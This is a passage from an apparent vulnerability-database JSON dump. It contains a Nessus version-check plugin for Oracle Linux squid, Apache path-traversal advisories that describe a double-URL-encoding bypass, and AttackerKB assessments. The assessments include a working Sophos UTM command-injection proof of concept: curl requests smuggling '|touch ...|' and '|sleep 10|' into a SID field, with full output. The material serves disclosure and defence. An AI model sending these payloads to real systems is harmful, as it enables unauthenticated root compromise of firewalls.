5.x before 5.0.6. Due to an input-validation bug, it is\n vulnerable to a Denial of Service attack (against all clients using the proxy). A client sends an HTTP\n Range request to trigger this. (CVE-2021-31808)\n\n - An issue was discovered in Squid before 4.15 and 5.x before 5.0.6. 
Due to incorrect parser validation, it\n allows a Denial of Service attack against the Cache Manager API. This allows a trusted client to trigger\n memory leaks that, over time, lead to a Denial of Service via an unspecified short query string. This\n attack is limited to clients with Cache Manager API access privilege. (CVE-2021-28652)\n\n - Squid before 4.15 and 5.x before 5.0.6 allows remote servers to cause a denial of service (affecting\n availability to all clients) via an HTTP response. The issue trigger is a header that can be expected to\n exist in HTTP traffic without any malicious intent by the server. (CVE-2021-33620)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://linux.oracle.com/errata/ELSA-2021-9465.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected squid, squid-migration-script and / or squid-sysvinit packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-28651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/05/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/09/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:squid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:squid-migration-script\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:squid-sysvinit\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/local_checks_enabled\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item('Host/OracleLinux')) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar release = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, 'Oracle Linux');\nvar os_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Oracle Linux');\nvar os_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Oracle Linux 7', 'Oracle Linux ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Oracle Linux', cpu);\n\nvar pkgs = [\n {'reference':'squid-3.5.20-17.0.1.el7_9.6', 'cpu':'aarch64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'7'},\n {'reference':'squid-3.5.20-17.0.1.el7_9.6', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'7'},\n {'reference':'squid-migration-script-3.5.20-17.0.1.el7_9.6', 'cpu':'aarch64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'7'},\n {'reference':'squid-migration-script-3.5.20-17.0.1.el7_9.6', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'7'},\n {'reference':'squid-sysvinit-3.5.20-17.0.1.el7_9.6', 'cpu':'aarch64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'7'},\n {'reference':'squid-sysvinit-3.5.20-17.0.1.el7_9.6', 'cpu':'x86_64', 'release':'7', 'rpm_spec_vers_cmp':TRUE, 'epoch':'7'}\n];\n\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var release = NULL;\n var sp = NULL;\n var cpu = NULL;\n var el_string = NULL;\n var rpm_spec_vers_cmp = NULL;\n var epoch = NULL;\n var allowmaj = NULL;\n var exists_check = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'EL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if 
(!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (reference && release) {\n if (exists_check) {\n if (rpm_exists(release:release, rpm:exists_check) && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n } else {\n if (rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'squid / squid-migration-script / squid-sysvinit');\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-03-09T15:30:20", "description": "The instance of Apache HTTP Server running on the remote host is affected by a path traversal vulnerability. 
A remote, unauthenticated attacker can exploit this issue, via a specially crafted HTTP request, to access arbitrary files on the remote host.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-18T00:00:00", "type": "nessus", "title": "Apache HTTP Server 2.4.49 & 2.4.50 Path Traversal (CVE-2021-42013)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-42013"], "modified": "2023-03-08T00:00:00", "cpe": ["cpe:/a:apache:http_server", "cpe:/a:apache:httpd"], "id": "APACHE_2_4_50_PATH_TRAVERSAL.NBIN", "href": "https://www.tenable.com/plugins/nessus/155600", "sourceData": "Binary data apache_2_4_50_path_traversal.nbin", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2021-11-26T19:07:07", "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-15T00:50:08", "type": "fedora", "title": "[SECURITY] Fedora 35 Update: httpd-2.4.51-2.fc35", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-15T00:50:08", "id": "FEDORA:00C4C3098596", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/WS5RVHOIIRECG65ZBTZY7IEJVWQSQPG3/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-26T19:07:07", "description": "The Apache HTTP Server is a powerful, efficient, and extensible web server. 
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-12T23:46:03", "type": "fedora", "title": "[SECURITY] Fedora 34 Update: httpd-2.4.51-1.fc34", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-12T23:46:03", "id": "FEDORA:BDD0730B86DF", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/RMIIEFINL6FUIOPD2A3M5XC6DH45Y3CC/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-03-09T02:16:05", "description": "A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \u201crequire all denied\u201d, these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue is known to be exploited in the wild. 
This issue only affects Apache 2.4.49 and not earlier versions. The fix in Apache HTTP Server 2.4.50 was found to be incomplete, see CVE-2021-42013.\n\n \n**Recent assessments:** \n \n**zeroSteiner** at October 05, 2021 3:29pm UTC reported:\n\nApache doesn\u2019t typically run with root privileges in most environments so the value of this vulnerability will largely be in using it to leak application-specific secrets such as signing keys, database connection strings, source code etc. Path traversal vulnerabilities are among the easiest to exploit and involve no type of corruption, making them very reliable and safe to use multiple times.\n\nThere will likely be evidence within the Apache access logs of exploitation. Filtering on the HTTP status code could also provide insight into what files the attacker was able to successfully leak.\n\n**noraj** at March 31, 2022 6:23pm UTC reported:\n\nApache doesn\u2019t typically run with root privileges in most environments so the value of this vulnerability will largely be in using it to leak application-specific secrets such as signing keys, database connection strings, source code etc. Path traversal vulnerabilities are among the easiest to exploit and involve no type of corruption, making them very reliable and safe to use multiple times.\n\nThere will likely be evidence within the Apache access logs of exploitation. 
Filtering on the HTTP status code could also provide insight into what files the attacker was able to successfully leak.\n\nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-05T00:00:00", "type": "attackerkb", "title": "CVE-2021-41773", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-11-03T00:00:00", "id": "AKB:4BB9D3C7-37EF-4B65-B2A8-550AFC30664C", "href": "https://attackerkb.com/topics/1RltOPCYqE/cve-2021-41773", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-17T02:00:34", "description": "Apache HTTPd is a popular open-source HTTP server from the Apache Foundation. \nOn October 8, 2021, Apache HTTPd officially released a security update disclosing CVE-2021-42013, a path traversal vulnerability in Apache HTTPd 2.4.49/2.4.50. Because the fix for CVE-2021-41773, the Apache HTTPd 2.4.49 path traversal vulnerability, was incomplete, an attacker can craft malicious requests that bypass the patch and use the traversal to read files outside the web directory. Additionally, if Apache HTTPd has CGI support enabled, an attacker can craft malicious requests to execute commands and take control of the server. The Alibaba Cloud Emergency Response Center urges Apache HTTPd users to take security measures as soon as possible to block attacks on this vulnerability.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-11T00:00:00", "type": "attackerkb", "title": "Apache HTTPd 2.4.49/2.4.50 Path Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-11T00:00:00", "id": "AKB:61971866-F0B5-4317-8AF4-C4E4C23279F1", 
"href": "https://attackerkb.com/topics/WzgBXAx8tH/apache-httpd-2-4-49-2-4-50", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T15:17:49", "description": "It was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration \u201crequire all denied\u201d, these requests can succeed. If CGI scripts are also enabled for these aliased paths, this could allow for remote code execution. This issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\n<https://blog.talosintelligence.com/2021/10/apache-vuln-threat-advisory.html>\n\n \n**Recent assessments:** \n \n**noraj** at March 31, 2022 6:44pm UTC reported:\n\nQualys says:\n\n> CVE-2021-42013 was introduced as the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient as it did not cover double URL encoding, therefore the vulnerable configurations remained the same, but payload used in 2.4.49 was double URL encoded in 2.4.50 to administer the same path traversal and remote code execution attack.\n> \n> The attack in 2.4.49 initially encoded the second dot (.) 
to %2e and the same was double URL encoded into %%32%65 for version 2.4.50\n\nAssessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-08T00:00:00", "id": "AKB:BD8195D2-FB3B-4F9B-82C5-32F5CBDEFF70", "href": "https://attackerkb.com/topics/OClg2d2nSp/cve-2021-42013-path-traversal-and-remote-code-execution-in-apache-http-server-2-4-49-and-2-4-50-incomplete-fix-of-cve-2021-41773", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-06T08:11:34", "description": "A remote code execution vulnerability in the WebAdmin of SG UTM was recently discovered and responsibly disclosed to Sophos. It was reported via the Sophos bug bounty program by an external security researcher. 
The vulnerability has been fixed.\n\nSophos would like to thank \u0141ukasz Rupala for responsibly disclosing this issue to Sophos.\n\nThe remediation prevented users from remotely executing arbitrary code. There was no evidence that the vulnerability was exploited and to our knowledge no customers are impacted.\n\nFix included in SG UTM v9.705 MR5, v9.607 MR7, and v9.511 MR11 on September 17, 2020 \nUsers of older versions of SG UTM are required to upgrade to receive this fix\n\nWorkaround\n\nCustomers can protect themselves by ensuring their WebAdmin is not exposed to WAN.\n\nThis can be achieved by keeping Internal (LAN) (Network) or another internal-only network definition as the sole entry in Management\u2192WebAdmin Settings\u2192WebAdmin Access Configuration\u2192Allowed Networks.\n\n \n**Recent assessments:** \n \n**wvu-r7** at August 26, 2021 2:01am UTC reported:\n\n_Please see the [Atredis writeup](<https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223>) for root cause analysis._\n\nCVE-2020-25223 has high attacker value and exploitability, since Sophos UTM is a [next-generation firewall (NGFW)](<https://en.wikipedia.org/wiki/Next-generation_firewall>), and the vulnerability offers unauthenticated attackers root access to a \u201cnetwork pivot\u201d device, all through a single HTTP request, demonstrated below:\n \n \n wvu@kharak:~$ curl -kv https://172.16.57.254:4444/var -H \"Content-Type: application/json; charset=UTF-8\" -d '{\"SID\":\"|touch /tmp/vulnerable|\"}'\n * Trying 172.16.57.254...\n * TCP_NODELAY set\n * Connected to 172.16.57.254 (172.16.57.254) port 4444 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), 
TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384\n * ALPN, server accepted to use http/1.1\n * Server certificate:\n * subject: C=de; ST=Baden-Wuerttemberg; L=Karlsruhe; O=Sophos; CN=host.domain.example; emailAddress=firewall@domain.example\n * start date: Feb 24 14:46:04 2015 GMT\n * expire date: Jan 24 14:46:04 2017 GMT\n * issuer: C=de; ST=Baden-Wuerttemberg; L=Karlsruhe; O=Sophos; CN=Sophos Default CA; emailAddress=firewall@domain.example\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n > POST /var HTTP/1.1\n > Host: 172.16.57.254:4444\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: application/json; charset=UTF-8\n > Content-Length: 33\n >\n * upload completely sent off: 33 out of 33 bytes\n < HTTP/1.1 200 OK\n < Date: Thu, 26 Aug 2021 04:17:09 GMT\n < Server: Apache\n < Expires: Thursday, 01-Jan-1970 00:00:01 GMT\n < Pragma: no-cache\n < X-Frame-Options: SAMEORIGIN\n < Strict-Transport-Security: max-age=63072000; includeSubDomains;\n < X-Content-Type-Options: nosniff\n < X-XSS-Protection: 1; mode=block\n < Content-Security-Policy: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < X-Content-Security-Policy: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < X-Webkit-CSP: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < Vary: Accept-Encoding\n < Transfer-Encoding: 
chunked\n < Content-Type: application/json; charset=utf-8\n <\n * Connection #0 to host 172.16.57.254 left intact\n {\"RID\":\"\",\"objs\":[{\"js\":\"json_abort(true);\"},{\"alert\":\"Backend connection failed, please click Shift-Reload to try again.\"}]}* Closing connection 0\n wvu@kharak:~$\n \n \n \n host:/root # ls -l /tmp/vulnerable\n -rw-r--r-- 1 root root 0 Aug 25 23:17 /tmp/vulnerable\n host:/root #\n \n\nChecking for the vulnerability can be accomplished by injecting a `sleep` command and timing the request\u2019s completion:\n \n \n wvu@kharak:~$ time curl -kv https://172.16.57.254:4444/var -H \"Content-Type: application/json; charset=UTF-8\" -d '{\"SID\":\"|sleep 10|\"}'\n * Trying 172.16.57.254...\n * TCP_NODELAY set\n * Connected to 172.16.57.254 (172.16.57.254) port 4444 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384\n * ALPN, server accepted to use http/1.1\n * Server certificate:\n * subject: C=de; ST=Baden-Wuerttemberg; L=Karlsruhe; O=Sophos; CN=host.domain.example; emailAddress=firewall@domain.example\n * start date: Feb 24 14:46:04 2015 GMT\n * expire date: Jan 24 14:46:04 2017 GMT\n * issuer: C=de; ST=Baden-Wuerttemberg; L=Karlsruhe; O=Sophos; CN=Sophos Default CA; emailAddress=firewall@domain.example\n * SSL certificate verify result: unable 
to get local issuer certificate (20), continuing anyway.\n > POST /var HTTP/1.1\n > Host: 172.16.57.254:4444\n > User-Agent: curl/7.64.1\n > Accept: */*\n > Content-Type: application/json; charset=UTF-8\n > Content-Length: 20\n >\n * upload completely sent off: 20 out of 20 bytes\n < HTTP/1.1 200 OK\n < Date: Thu, 26 Aug 2021 15:47:17 GMT\n < Server: Apache\n < Expires: Thursday, 01-Jan-1970 00:00:01 GMT\n < Pragma: no-cache\n < X-Frame-Options: SAMEORIGIN\n < Strict-Transport-Security: max-age=63072000; includeSubDomains;\n < X-Content-Type-Options: nosniff\n < X-XSS-Protection: 1; mode=block\n < Content-Security-Policy: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < X-Content-Security-Policy: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < X-Webkit-CSP: default-src 'self'; img-src 'self' data:; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; connect-src 'self' wss:;\n < Vary: Accept-Encoding\n < Transfer-Encoding: chunked\n < Content-Type: application/json; charset=utf-8\n <\n * Connection #0 to host 172.16.57.254 left intact\n {\"RID\":\"\",\"objs\":[{\"js\":\"json_abort(true);\"},{\"alert\":\"Backend connection failed, please click Shift-Reload to try again.\"}]}* Closing connection 0\n \n real\t0m10.114s\n user\t0m0.020s\n sys\t0m0.018s\n wvu@kharak:~$\n \n\n**NinjaOperator** at August 25, 2021 5:02pm UTC reported:\n\n_Please see the [Atredis writeup](<https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223>) for root cause analysis._\n\nCVE-2020-25223 has high attacker value and exploitability, since Sophos UTM is a [next-generation firewall (NGFW)](<https://en.wikipedia.org/wiki/Next-generation_firewall>), and the vulnerability offers unauthenticated attackers root access to a \u201cnetwork pivot\u201d 
device, all through a single HTTP request, demonstrated below:\n \n \n wvu@kharak:~$ curl -kv https://172.16.57.254:4444/var -H \"Content-Type: application/json; charset=UTF-8\" -d '{\"SID\":\"|touch /tmp/vulnerable|\"}'\n * Trying 172.16.57.254...\n * TCP_NODELAY set\n * Connected to 172.16.57.254 (172.16.57.254) port 4444 (#0)\n * ALPN, offering h2\n * ALPN, offering http/1.1\n * successfully set certificate verify locations:\n * CAfile: /etc/ssl/cert.pem\n CApath: none\n * TLSv1.2 (OUT), TLS handshake, Client hello (1):\n * TLSv1.2 (IN), TLS handshake, Server hello (2):\n * TLSv1.2 (IN), TLS handshake, Certificate (11):\n * TLSv1.2 (IN), TLS handshake, Server key exchange (12):\n * TLSv1.2 (IN), TLS handshake, Server finished (14):\n * TLSv1.2 (OUT), TLS handshake, Client key exchange (16):\n * TLSv1.2 (OUT), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (OUT), TLS handshake, Finished (20):\n * TLSv1.2 (IN), TLS change cipher, Change cipher spec (1):\n * TLSv1.2 (IN), TLS handshake, Finished (20):\n * SSL connection using TLSv1.2 / ECDHE-RSA-AES256-GCM-SHA384\n * ALPN, server accepted to use http/1.1\n * Server certificate:\n * subject: C=de; ST=Baden-Wuerttemberg; L=Karlsruhe; O=Sophos; CN=host.domain.example; emailAddress=firewall@domain.example\n * start date: Feb 24 14:46:04 2015 GMT\n * expire date: Jan 24 14:46:04 2017 GMT\n * issuer: C=de; ST=Baden-Wuerttemberg; L=Karlsruhe; O=Sophos; CN=Sophos Default CA; emailAddress=firewall@domain.example\n * SSL certificate verify result: unable to get local issuer certificate (20), continuing anyway.\n > POST /var HTTP/1.1\n > Host: 